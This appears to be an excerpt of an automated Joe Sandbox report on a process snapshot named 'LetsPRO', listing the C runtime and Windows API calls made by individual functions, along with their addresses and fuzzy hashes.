                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 69daed4d9beaedea8a5ce3bf8483e580b10bee0cd76c2a5add48e82975206ff7
                                        • Instruction ID: a2dabf286ca3206072320b93555e1fdc08d66beed9a23ef705cae15bccdc7501
                                        • Opcode Fuzzy Hash: 69daed4d9beaedea8a5ce3bf8483e580b10bee0cd76c2a5add48e82975206ff7
                                        • Instruction Fuzzy Hash: 25519C31104311CFD716CF29C981B16B7F4FF99328F148A6DE5AA8BA95D730E849CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C943CE9
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6C943CFC
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6C943D03
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6C943D4E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 07e1e8a5f72ae8c2d99dfdf407c87043eaf16671770e8468c99335f238f8ccf7
                                        • Instruction ID: 9dbf6ebf994e0b8192f90e1eb87c464ffad79b336918e416468fa90da958b616
                                        • Opcode Fuzzy Hash: 07e1e8a5f72ae8c2d99dfdf407c87043eaf16671770e8468c99335f238f8ccf7
                                        • Instruction Fuzzy Hash: 55516830208341CFD715CF39C584B16B7E4BF99329F14CA6DE5AA8BA95E730E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?), ref: 6C93FB45
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?), ref: 6C93FB58
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?), ref: 6C93FB5F
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,?), ref: 6C93FBAA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: 2bc02e79309228a9f2fc27723ed5db87cb1678b6b6792ceca9b2e9e7295562d4
                                        • Instruction ID: 1c8719a3014ec5b84abc6eada12b6e3cb79d9a513979ab7e2a4e1b1961771954
                                        • Opcode Fuzzy Hash: 2bc02e79309228a9f2fc27723ed5db87cb1678b6b6792ceca9b2e9e7295562d4
                                        • Instruction Fuzzy Hash: 155178711083118FD715CF29C580B16B7F4FF99328F149AADE4AE8BA95E730E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_mbsdec
                                        • String ID:
                                        • API String ID: 1897159254-0
                                        • Opcode ID: ba363baece1d8c7b684dc0194931fb9f6142483f88c8384219b9233af3681357
                                        • Instruction ID: 438f707a2924e818cacd4709a3378d0519a623f756b8c8783db1517a4d87abd3
                                        • Opcode Fuzzy Hash: ba363baece1d8c7b684dc0194931fb9f6142483f88c8384219b9233af3681357
                                        • Instruction Fuzzy Hash: 4531272628C2D99FD7128F38C9512AA3BB9BB56314B2564A8E8D94FE01D231D886D750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000), ref: 6C9438D6
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000,00000000), ref: 6C9438E8
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000,00000000), ref: 6C9438EF
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(00000000,00000000), ref: 6C943936
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                        • String ID:
                                        • API String ID: 4058414921-0
                                        • Opcode ID: b62486c84676e4152b750b6c50ae8c7902c16ea1c48dc794696d889406f543d4
                                        • Instruction ID: 489ce7a5cff45bf918fbfbc7547e2afd15661d423dc2039913dc26b489e1ff72
                                        • Opcode Fuzzy Hash: b62486c84676e4152b750b6c50ae8c7902c16ea1c48dc794696d889406f543d4
                                        • Instruction Fuzzy Hash: 52416630900205CFDB19CF39C584BAAB7F4BF58328F24C6ADC5669BA91E730E941CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,759230B0,?,?,6C940F7E), ref: 6C940FF1
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C9410D2
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9410DF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$??3@EnterLeave
                                        • String ID:
                                        • API String ID: 3906572401-0
                                        • Opcode ID: 7df3e9a057b079e8f65389b7cd9c82cba615f1f578220e1f9bf887b61960c328
                                        • Instruction ID: a6664b2c62d546a864269542c1051e2980a67eb9b3dc3e348767be9e4c03ee9a
                                        • Opcode Fuzzy Hash: 7df3e9a057b079e8f65389b7cd9c82cba615f1f578220e1f9bf887b61960c328
                                        • Instruction Fuzzy Hash: 6241CF74604640CFC724CF29C080A9AB7F8FF5A315F1485AEE88ACBB11E731E955DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C9484BF
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9484F4
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?,?), ref: 6C948502
                                        • std::exception::exception.LIBCMT(?,?), ref: 6C9485D7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1840351702-0
                                        • Opcode ID: f4692de7e15d965feb1a69631453fe46fc9a97292e23ffc55044cc803bd2c5ed
                                        • Instruction ID: b3c270d62fa5c870e3010275850f5b1fa15a4f8aef5866948dbab75e891ef851
                                        • Opcode Fuzzy Hash: f4692de7e15d965feb1a69631453fe46fc9a97292e23ffc55044cc803bd2c5ed
                                        • Instruction Fuzzy Hash: 3D41D071504385DFDF19CF65C084A9DBBB8AF1031CF1484AED986ABA51CB70EA89CBD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6C904479
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6C90449F
                                        • _errno.MSVCR100(?,?,?,?), ref: 6C92A1CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_errno_isleadbyte_l
                                        • String ID:
                                        • API String ID: 911568377-0
                                        • Opcode ID: f1be938d15060576b74b8d59e7d1da8dc8b425d2b94f5246e4b4a79e7cc292f0
                                        • Instruction ID: 87b0a47f52c37ae986d32dce22852b7ec9d15c3dd6a67926287049a7be2b284a
                                        • Opcode Fuzzy Hash: f1be938d15060576b74b8d59e7d1da8dc8b425d2b94f5246e4b4a79e7cc292f0
                                        • Instruction Fuzzy Hash: E0310532705255EFDB00DF64C884AAE3BB9FF02328F14456DE4A5DB692DB31DA80CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C92A334
                                        • _isleadbyte_l.MSVCR100(00000008,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6C92A370
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6C92A3BD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: String__crt__isctype_l_isleadbyte_l
                                        • String ID:
                                        • API String ID: 150061899-0
                                        • Opcode ID: 0988bc518175f7f60f598ee9daddff1fd1dbe5f73af34c926759ebd1c574d147
                                        • Instruction ID: d3004993d66fde2ad1650548c3860291cc1881bd79c7059af334962587a16d54
                                        • Opcode Fuzzy Hash: 0988bc518175f7f60f598ee9daddff1fd1dbe5f73af34c926759ebd1c574d147
                                        • Instruction Fuzzy Hash: 32313731A08249EFDF01CB98C845FEE7FB8EF12318F1441A9E5949BA91DB35D685CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C93659C
                                          • Part of subcall function 6C936EC2: _SpinWait.LIBCMT(00000FA0,00000FA0,?,6C93ABFA,00000000), ref: 6C936EDC
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C9365E2
                                        • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100(6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B,?), ref: 6C936632
                                        • Sleep.KERNEL32(00000001,6C9366E0,0000002C,6C936A53,00000000,-00000004,-00000004,00000000,00000000,?,6C93F820,?,00000000,?,?,6C939B4B), ref: 6C936652
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@Spin$AcquireLock@details@ReaderWrite@_Writer$A@@details@Once@?$_SleepWaitWait@$0
                                        • String ID:
                                        • API String ID: 947146699-0
                                        • Opcode ID: 6051d207057bbff6907139953b71f664d48f5ed7fc9647ced1ef9d5c8e4d787a
                                        • Instruction ID: 8ed5b443bbda18b4faaa1b10f32008938f20dc5dd0107ff2e1db0fa1f76b6603
                                        • Opcode Fuzzy Hash: 6051d207057bbff6907139953b71f664d48f5ed7fc9647ced1ef9d5c8e4d787a
                                        • Instruction Fuzzy Hash: DC414371A00B68CFEB10CFA8C5447CEBBB1BF24358F142528C459A7A80CB75E908CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: 326b6cd964aaa0cdbd0c02533cf45ed4de55326c12ac84c500560b9e1f884dfe
                                        • Instruction ID: 83a2b8977f214e170d65937f3553c21beb4fd28d432c091627adac236badce39
                                        • Opcode Fuzzy Hash: 326b6cd964aaa0cdbd0c02533cf45ed4de55326c12ac84c500560b9e1f884dfe
                                        • Instruction Fuzzy Hash: 7421E276B06225DBDB149F29C8006BA33B9FF71B4CB29419DECA08BB54E735D940DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _towlower_l.MSVCR100(?,?,?), ref: 6C910DE7
                                          • Part of subcall function 6C90257C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6C9025C0
                                        • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6C910DF7
                                        • _errno.MSVCR100 ref: 6C92C713
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C71E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                        • String ID:
                                        • API String ID: 2204055994-0
                                        • Opcode ID: 64124899a46ccb5a046c23fd0fa33207cc7602b26788b075233cb4fb38afb576
                                        • Instruction ID: 0056c63abdd5f960b89a46a3bcf5e24dc8c3bd33eeba46b4638c5d59f0790201
                                        • Opcode Fuzzy Hash: 64124899a46ccb5a046c23fd0fa33207cc7602b26788b075233cb4fb38afb576
                                        • Instruction Fuzzy Hash: C8214B7650519AD7EB209E6AC8817BA37BCBB10F59F600516E8F0CBA84E739CD54C770
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C93A869: _fabs.LIBCMT(00000000,00000000,00000000,00000000,?,6C93A797,00000000,00000000,?,6C93A58B), ref: 6C93A8A1
                                        • sqrt.MSVCR100(?,?,?,?,?), ref: 6C93A71F
                                        • _fabs.LIBCMT(?,?,?,?,?), ref: 6C93A72D
                                          • Part of subcall function 6C98132F: __ctrlfp.LIBCMT ref: 6C981348
                                          • Part of subcall function 6C98132F: __except1.LIBCMT ref: 6C981394
                                        • _fabs.LIBCMT(?,?,?,?,?), ref: 6C93A74E
                                        • exp.MSVCR100(?,?,?,?,?), ref: 6C93A75C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fabs$__ctrlfp__except1sqrt
                                        • String ID:
                                        • API String ID: 2723176039-0
                                        • Opcode ID: c4640897e338dc08dc9c3ab7b8461035ce6526b115f48cb004446e78f55bf37a
                                        • Instruction ID: 4f5fd948bbd104171ee21be6446c4221f0507d909152c9a791a928dde37df279
                                        • Opcode Fuzzy Hash: c4640897e338dc08dc9c3ab7b8461035ce6526b115f48cb004446e78f55bf37a
                                        • Instruction Fuzzy Hash: B521B371E00518EACF046FF4E8884EEFBB4EF54354F208495E89862790DF31D966C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcspbrk.LIBCMT(?,6C91609C,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C91607B
                                        • _calloc_crt.MSVCR100(00000004,00000001,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C9160C0
                                        • free.MSVCR100(00000000,?,00000000,6C91668A,?,?,?,?,?,?,6C915A4E), ref: 6C9160FC
                                        • _wmatch.LIBCMT ref: 6C927778
                                          • Part of subcall function 6C91601B: _malloc_crt.MSVCR100(00000008,?,6C94CD5F,?,00000000,-00000002,6C9A5BD0), ref: 6C916022
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
                                        • String ID:
                                        • API String ID: 588445202-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6C937DD7
                                        • GetLastError.KERNEL32 ref: 6C937DE4
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6C937DF6
                                          • Part of subcall function 6C937483: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                          • Part of subcall function 6C937483: std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                          • Part of subcall function 6C937483: _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 6C937DFC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 3155262267-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _mbspbrk.MSVCR100(?,6C94CB08,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CA73
                                        • _match.LIBCMT ref: 6C94CA80
                                        • _calloc_crt.MSVCR100(00000004,00000002,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CAB4
                                        • free.MSVCR100(?,?,00000000,6C94BF68,?,?,?,?,?,?,6C927472), ref: 6C94CAF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: _calloc_crt_match_mbspbrkfree
                                        • String ID:
                                        • API String ID: 518297505-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,6C9A7C68,00000104,?,?,?,?,?,?,6C927472), ref: 6C94BEE6
                                        • _parse_cmdline.LIBCMT ref: 6C94BF11
                                        • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6C927472), ref: 6C94BF34
                                        • _parse_cmdline.LIBCMT ref: 6C94BF4D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: _parse_cmdline$FileModuleName_malloc_crt
                                        • String ID:
                                        • API String ID: 3364912563-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C9485FA
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C948627
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?,?), ref: 6C948635
                                        • std::exception::exception.LIBCMT(?,?), ref: 6C948692
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1840351702-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • TlsSetValue.KERNEL32(?,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940B8E
                                        • QueryDepthSList.KERNEL32(00000148,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BA2
                                        • CloseHandle.KERNEL32(?,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BC4
                                        • InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,6C940AA4,00000001,?,6C940AC4), ref: 6C940BDC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                        • String ID:
                                        • API String ID: 94243546-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock_file.MSVCR100(?,6C90CDA8,00000014), ref: 6C90CD4E
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fgetwc_nolock.MSVCR100(?,?,?,6C90CDA8,00000014), ref: 6C90CD63
                                        • _errno.MSVCR100(6C90CDA8,00000014), ref: 6C912A5C
                                        • _invalid_parameter_noinfo.MSVCR100(6C90CDA8,00000014), ref: 6C928700
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                        • String ID:
                                        • API String ID: 3916178533-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID:
                                        • API String ID: 168861036-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C938FDF
